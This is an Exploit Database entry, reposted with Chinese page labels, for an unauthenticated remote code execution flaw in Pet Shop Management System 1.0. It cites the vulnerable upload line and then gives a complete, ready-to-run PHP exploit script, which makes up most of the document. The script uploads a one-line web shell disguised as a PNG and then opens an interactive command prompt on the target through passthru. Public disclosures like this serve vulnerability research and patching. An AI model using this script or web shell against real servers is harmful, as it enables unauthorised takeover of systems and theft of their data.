Pet Shop Management System 1.0 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 34 阅读

• 作者： Mr.Gedik
  日期： 2021-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50353/

• # Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
  # Date: 28.09.2021
  # Author: Mr.Gedik
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
  # Version: 1.0
  # https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB
  
  
  Vulnerable code controllers/add_petmanagement.php
  Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
  $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
  addslashes($_FILES["images"]["name"]));
  
  Exploit
  #############
  
  <?php
  /*
  @author:mrgedik
  */
  function anim($msg, $time)
  {
  $msg = str_split($msg);
  foreach ($msg as $ms) {
  echo $ms;
  usleep($time);
  }
  }
  
  anim("____ ______ _ _
  |\/| / ____|| (_) |
  | \/ |_ __| |_______| |_| | __
  | |\/| | '__| | |_ |/ _ \/ _` | | |/ /
  | || | |_ | |__| |__/ (_| | | <
  |_||_|_(_) \_____|\___|\__,_|_|_|\_\
  ", 900);
  
  echo PHP_EOL;
  while(1)
  {
  echo anim("Target (http://example.com/path/): ", 800);
  $target = trim(fgets(STDIN));
  echo PHP_EOL;
  if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
  echo "Not a valid URL".PHP_EOL;
  }else {
  break;
  }
  }
  @unlink("exp.php");
  $fw = fopen("exp.php","a+");
  fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
  fclose($fw);
  
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
  $fields = [
  'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
  ];
  curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
  
  
  $response = curl_exec($ch);
  @unlink("exp.php");
  
  if(strstr($response,"success"))
  {
  while(1)
  {
  echo anim("root@pwn: ", 800);
  $command = trim(fgets(STDIN));
  if($command == trim("exit"))
  {
  exit;
  }
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  echo curl_exec($ch);
  curl_close ($ch);
  }
  }else
  {
  echo anim("Fail", 800);
  }
  
  
  ?>